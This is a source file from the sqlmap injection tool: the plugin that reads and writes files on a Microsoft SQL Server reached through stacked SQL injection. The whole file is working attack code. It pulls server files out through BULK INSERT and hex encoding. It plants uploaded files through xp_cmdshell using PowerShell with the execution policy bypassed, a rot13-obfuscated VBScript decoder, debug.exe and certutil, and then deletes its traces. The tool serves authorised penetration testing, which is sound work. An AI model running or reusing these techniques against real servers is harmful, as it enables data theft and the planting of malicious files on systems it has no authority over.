#!/usr/bin/env python """ Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ import ntpath import os from lib.core.common import checkFile from lib.core.common import getLimitRange from lib.core.common import isNumPosStrValue from lib.core.common import isTechniqueAvailable from lib.core.common import posixToNtSlashes from lib.core.common import randomStr from lib.core.common import readInput from lib.core.compat import xrange from lib.core.convert import encodeBase64 from lib.core.convert import encodeHex from lib.core.convert import rot13 from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.enums import CHARSET_TYPE from lib.core.enums import EXPECTED from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapNoneDataException from lib.core.exception import SqlmapUnsupportedFeatureException from lib.request import inject from plugins.generic.filesystem import Filesystem as GenericFilesystem class Filesystem(GenericFilesystem): def _dataToScr(self, fileContent, chunkName): fileLines = [] fileSize = len(fileContent) lineAddr = 0x100 lineLen = 20 fileLines.append("n %s" % chunkName) fileLines.append("rcx") fileLines.append("%x" % fileSize) fileLines.append("f 0100 %x 00" % fileSize) for fileLine in xrange(0, len(fileContent), lineLen): scrString = "" for lineChar in fileContent[fileLine:fileLine + lineLen]: strLineChar = encodeHex(lineChar, binary=False) if not scrString: scrString = "e %x %s" % (lineAddr, strLineChar) else: scrString += " %s" % strLineChar lineAddr += len(strLineChar) // 2 fileLines.append(scrString) fileLines.append("w") fileLines.append("q") return fileLines def _updateDestChunk(self, fileContent, tmpPath): randScr = "tmpf%s.scr" % randomStr(lowercase=True) chunkName = randomStr(lowercase=True) fileScrLines = self._dataToScr(fileContent, chunkName) logger.debug("uploading debug script to %s\\%s, please wait.." % (tmpPath, randScr)) self.xpCmdshellWriteFile(fileScrLines, tmpPath, randScr) logger.debug("generating chunk file %s\\%s from debug script %s" % (tmpPath, chunkName, randScr)) commands = ( "cd \"%s\"" % tmpPath, "debug < %s" % randScr, "del /F /Q %s" % randScr ) self.execCmd(" & ".join(command for command in commands)) return chunkName def stackedReadFile(self, remoteFile): if not kb.bruteMode: infoMsg = "fetching file: '%s'" % remoteFile logger.info(infoMsg) result = [] txtTbl = self.fileTblName hexTbl = "%s%shex" % (self.fileTblName, randomStr()) self.createSupportTbl(txtTbl, self.tblField, "text") inject.goStacked("DROP TABLE %s" % hexTbl) inject.goStacked("CREATE TABLE %s(id INT IDENTITY(1, 1) PRIMARY KEY, %s %s)" % (hexTbl, self.tblField, "VARCHAR(4096)")) logger.debug("loading the content of file '%s' into support table" % remoteFile) inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (txtTbl, remoteFile, randomStr(10), randomStr(10)), silent=True) # Reference: https://web.archive.org/web/20120211184457/http://support.microsoft.com/kb/104829 binToHexQuery = """DECLARE @charset VARCHAR(16) DECLARE @counter INT DECLARE @hexstr VARCHAR(4096) DECLARE @length INT DECLARE @chunk INT SET @charset = '0123456789ABCDEF' SET @counter = 1 SET @hexstr = '' SET @length = (SELECT DATALENGTH(%s) FROM %s) SET @chunk = 1024 WHILE (@counter <= @length) BEGIN DECLARE @tempint INT DECLARE @firstint INT DECLARE @secondint INT SET @tempint = CONVERT(INT, (SELECT ASCII(SUBSTRING(%s, @counter, 1)) FROM %s)) SET @firstint = floor(@tempint/16) SET @secondint = @tempint - (@firstint * 16) SET @hexstr = @hexstr + SUBSTRING(@charset, @firstint+1, 1) + SUBSTRING(@charset, @secondint+1, 1) SET @counter = @counter + 1 IF @counter %% @chunk = 0 BEGIN INSERT INTO %s(%s) VALUES(@hexstr) SET @hexstr = '' END END IF @counter %% (@chunk) != 0 BEGIN INSERT INTO %s(%s) VALUES(@hexstr) END """ % (self.tblField, txtTbl, self.tblField, txtTbl, hexTbl, self.tblField, hexTbl, self.tblField) binToHexQuery = binToHexQuery.replace(" ", "").replace("\n", " ") inject.goStacked(binToHexQuery) if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION): result = inject.getValue("SELECT %s FROM %s ORDER BY id ASC" % (self.tblField, hexTbl), resumeValue=False, blind=False, time=False, error=False) if not result: result = [] count = inject.getValue("SELECT COUNT(*) FROM %s" % (hexTbl), resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if not isNumPosStrValue(count): errMsg = "unable to retrieve the content of the " errMsg += "file '%s'" % remoteFile raise SqlmapNoneDataException(errMsg) indexRange = getLimitRange(count) for index in indexRange: chunk = inject.getValue("SELECT TOP 1 %s FROM %s WHERE %s NOT IN (SELECT TOP %d %s FROM %s ORDER BY id ASC) ORDER BY id ASC" % (self.tblField, hexTbl, self.tblField, index, self.tblField, hexTbl), unpack=False, resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL) result.append(chunk) inject.goStacked("DROP TABLE %s" % hexTbl) return result def unionWriteFile(self, localFile, remoteFile, fileType, forceCheck=False): errMsg = "Microsoft SQL Server does not support file upload with " errMsg += "UNION query SQL injection technique" raise SqlmapUnsupportedFeatureException(errMsg) def _stackedWriteFilePS(self, tmpPath, localFileContent, remoteFile, fileType): infoMsg = "using PowerShell to write the %s file content " % fileType infoMsg += "to file '%s'" % remoteFile logger.info(infoMsg) encodedFileContent = encodeBase64(localFileContent, binary=False) encodedBase64File = "tmpf%s.txt" % randomStr(lowercase=True) encodedBase64FilePath = "%s\\%s" % (tmpPath, encodedBase64File) randPSScript = "tmpps%s.ps1" % randomStr(lowercase=True) randPSScriptPath = "%s\\%s" % (tmpPath, randPSScript) localFileSize = len(encodedFileContent) chunkMaxSize = 1024 logger.debug("uploading the base64-encoded file to %s, please wait.." % encodedBase64FilePath) for i in xrange(0, localFileSize, chunkMaxSize): wEncodedChunk = encodedFileContent[i:i + chunkMaxSize] self.xpCmdshellWriteFile(wEncodedChunk, tmpPath, encodedBase64File) psString = "$Base64 = Get-Content -Path \"%s\"; " % encodedBase64FilePath psString += "$Base64 = $Base64 -replace \"`t|`n|`r\",\"\"; $Content = " psString += "[System.Convert]::FromBase64String($Base64); Set-Content " psString += "-Path \"%s\" -Value $Content -Encoding Byte" % remoteFile logger.debug("uploading the PowerShell base64-decoding script to %s" % randPSScriptPath) self.xpCmdshellWriteFile(psString, tmpPath, randPSScript) logger.debug("executing the PowerShell base64-decoding script to write the %s file, please wait.." % remoteFile) commands = ( "powershell -ExecutionPolicy ByPass -File \"%s\"" % randPSScriptPath, "del /F /Q \"%s\"" % encodedBase64FilePath, "del /F /Q \"%s\"" % randPSScriptPath ) self.execCmd(" & ".join(command for command in commands)) def _stackedWriteFileDebugExe(self, tmpPath, localFile, localFileContent, remoteFile, fileType): infoMsg = "using debug.exe to write the %s " % fileType infoMsg += "file content to file '%s', please wait.." % remoteFile logger.info(infoMsg) remoteFileName = ntpath.basename(remoteFile) sFile = "%s\\%s" % (tmpPath, remoteFileName) localFileSize = os.path.getsize(localFile) debugSize = 0xFF00 if localFileSize < debugSize: chunkName = self._updateDestChunk(localFileContent, tmpPath) debugMsg = "renaming chunk file %s\\%s to %s " % (tmpPath, chunkName, fileType) debugMsg += "file %s\\%s and moving it to %s" % (tmpPath, remoteFileName, remoteFile) logger.debug(debugMsg) commands = ( "cd \"%s\"" % tmpPath, "ren %s %s" % (chunkName, remoteFileName), "move /Y %s %s" % (remoteFileName, remoteFile) ) self.execCmd(" & ".join(command for command in commands)) else: debugMsg = "the file is larger than %d bytes. " % debugSize debugMsg += "sqlmap will split it into chunks locally, upload " debugMsg += "it chunk by chunk and recreate the original file " debugMsg += "on the server, please wait.." logger.debug(debugMsg) for i in xrange(0, localFileSize, debugSize): localFileChunk = localFileContent[i:i + debugSize] chunkName = self._updateDestChunk(localFileChunk, tmpPath) if i == 0: debugMsg = "renaming chunk " copyCmd = "ren %s %s" % (chunkName, remoteFileName) else: debugMsg = "appending chunk " copyCmd = "copy /B /Y %s+%s %s" % (remoteFileName, chunkName, remoteFileName) debugMsg += "%s\\%s to %s file %s\\%s" % (tmpPath, chunkName, fileType, tmpPath, remoteFileName) logger.debug(debugMsg) commands = ( "cd \"%s\"" % tmpPath, copyCmd, "del /F /Q %s" % chunkName ) self.execCmd(" & ".join(command for command in commands)) logger.debug("moving %s file %s to %s" % (fileType, sFile, remoteFile)) commands = ( "cd \"%s\"" % tmpPath, "move /Y %s %s" % (remoteFileName, remoteFile) ) self.execCmd(" & ".join(command for command in commands)) def _stackedWriteFileVbs(self, tmpPath, localFileContent, remoteFile, fileType): infoMsg = "using a custom visual basic script to write the " infoMsg += "%s file content to file '%s', please wait.." % (fileType, remoteFile) logger.info(infoMsg) randVbs = "tmps%s.vbs" % randomStr(lowercase=True) randFile = "tmpf%s.txt" % randomStr(lowercase=True) randFilePath = "%s\\%s" % (tmpPath, randFile) vbs = """Qvz vachgSvyrCngu, bhgchgSvyrCngu vachgSvyrCngu = "%f" bhgchgSvyrCngu = "%f" Frg sf = PerngrBowrpg("Fpevcgvat.SvyrFlfgrzBowrpg") Frg svyr = sf.TrgSvyr(vachgSvyrCngu) Vs svyr.Fvmr Gura Jfpevcg.Rpub "Ybnqvat sebz: " & vachgSvyrCngu Jfpevcg.Rpub Frg sq = sf.BcraGrkgSvyr(vachgSvyrCngu, 1) qngn = sq.ErnqNyy sq.Pybfr qngn = Ercynpr(qngn, " ", "") qngn = Ercynpr(qngn, ioPe, "") qngn = Ercynpr(qngn, ioYs, "") Jfpevcg.Rpub "Svkrq Vachg: " Jfpevcg.Rpub qngn Jfpevcg.Rpub qrpbqrqQngn = onfr64_qrpbqr(qngn) Jfpevcg.Rpub "Bhgchg: " Jfpevcg.Rpub qrpbqrqQngn Jfpevcg.Rpub Jfpevcg.Rpub "Jevgvat bhgchg va: " & bhgchgSvyrCngu Jfpevcg.Rpub Frg bsf = PerngrBowrpg("Fpevcgvat.SvyrFlfgrzBowrpg").BcraGrkgSvyr(bhgchgSvyrCngu, 2, Gehr) bsf.Jevgr qrpbqrqQngn bsf.pybfr Ryfr Jfpevcg.Rpub "Gur svyr vf rzcgl." Raq Vs Shapgvba onfr64_qrpbqr(olIny fgeVa) Qvz j1, j2, j3, j4, a, fgeBhg Sbe a = 1 Gb Yra(fgeVa) Fgrc 4 j1 = zvzrqrpbqr(Zvq(fgeVa, a, 1)) j2 = zvzrqrpbqr(Zvq(fgeVa, a + 1, 1)) j3 = zvzrqrpbqr(Zvq(fgeVa, a + 2, 1)) j4 = zvzrqrpbqr(Zvq(fgeVa, a + 3, 1)) Vs Abg j2 Gura _ fgeBhg = fgeBhg + Pue(((j1 * 4 + Vag(j2 / 16)) Naq 255)) Vs Abg j3 Gura _ fgeBhg = fgeBhg + Pue(((j2 * 16 + Vag(j3 / 4)) Naq 255)) Vs Abg j4 Gura _ fgeBhg = fgeBhg + Pue(((j3 * 64 + j4) Naq 255)) Arkg onfr64_qrpbqr = fgeBhg Raq Shapgvba Shapgvba zvzrqrpbqr(olIny fgeVa) Onfr64Punef = "NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm0123456789+/" Vs Yra(fgeVa) = 0 Gura zvzrqrpbqr = -1 : Rkvg Shapgvba Ryfr zvzrqrpbqr = VaFge(Onfr64Punef, fgeVa) - 1 Raq Vs Raq Shapgvba""" # NOTE: https://github.com/sqlmapproject/sqlmap/issues/5581 vbs = rot13(vbs) vbs = vbs.replace(" ", "") encodedFileContent = encodeBase64(localFileContent, binary=False) logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath) self.xpCmdshellWriteFile(encodedFileContent, tmpPath, randFile) logger.debug("uploading a visual basic decoder stub %s\\%s, please wait.." % (tmpPath, randVbs)) self.xpCmdshellWriteFile(vbs, tmpPath, randVbs) commands = ( "cd \"%s\"" % tmpPath, "cscript //nologo %s" % randVbs, "del /F /Q %s" % randVbs, "del /F /Q %s" % randFile ) self.execCmd(" & ".join(command for command in commands)) def _stackedWriteFileCertutilExe(self, tmpPath, localFile, localFileContent, remoteFile, fileType): infoMsg = "using certutil.exe to write the %s " % fileType infoMsg += "file content to file '%s', please wait.." % remoteFile logger.info(infoMsg) chunkMaxSize = 500 randFile = "tmpf%s.txt" % randomStr(lowercase=True) randFilePath = "%s\\%s" % (tmpPath, randFile) encodedFileContent = encodeBase64(localFileContent, binary=False) splittedEncodedFileContent = '\n'.join([encodedFileContent[i:i + chunkMaxSize] for i in xrange(0, len(encodedFileContent), chunkMaxSize)]) logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath) self.xpCmdshellWriteFile(splittedEncodedFileContent, tmpPath, randFile) logger.debug("decoding the file to %s.." % remoteFile) commands = ( "cd \"%s\"" % tmpPath, "certutil -f -decode %s %s" % (randFile, remoteFile), "del /F /Q %s" % randFile ) self.execCmd(" & ".join(command for command in commands)) def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False): # NOTE: this is needed here because we use xp_cmdshell extended # procedure to write a file on the back-end Microsoft SQL Server # file system self.initEnv() self.getRemoteTempPath() tmpPath = posixToNtSlashes(conf.tmpPath) remoteFile = posixToNtSlashes(remoteFile) checkFile(localFile) localFileContent = open(localFile, "rb").read() self._stackedWriteFilePS(tmpPath, localFileContent, remoteFile, fileType) written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck) if written is False: message = "do you want to try to upload the file with " message += "the custom Visual Basic script technique? [Y/n] " if readInput(message, default='Y', boolean=True): self._stackedWriteFileVbs(tmpPath, localFileContent, remoteFile, fileType) written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck) if written is False: message = "do you want to try to upload the file with " message += "the built-in debug.exe technique? [Y/n] " if readInput(message, default='Y', boolean=True): self._stackedWriteFileDebugExe(tmpPath, localFile, localFileContent, remoteFile, fileType) written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck) if written is False: message = "do you want to try to upload the file with " message += "the built-in certutil.exe technique? [Y/n] " if readInput(message, default='Y', boolean=True): self._stackedWriteFileCertutilExe(tmpPath, localFile, localFileContent, remoteFile, fileType) written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck) return written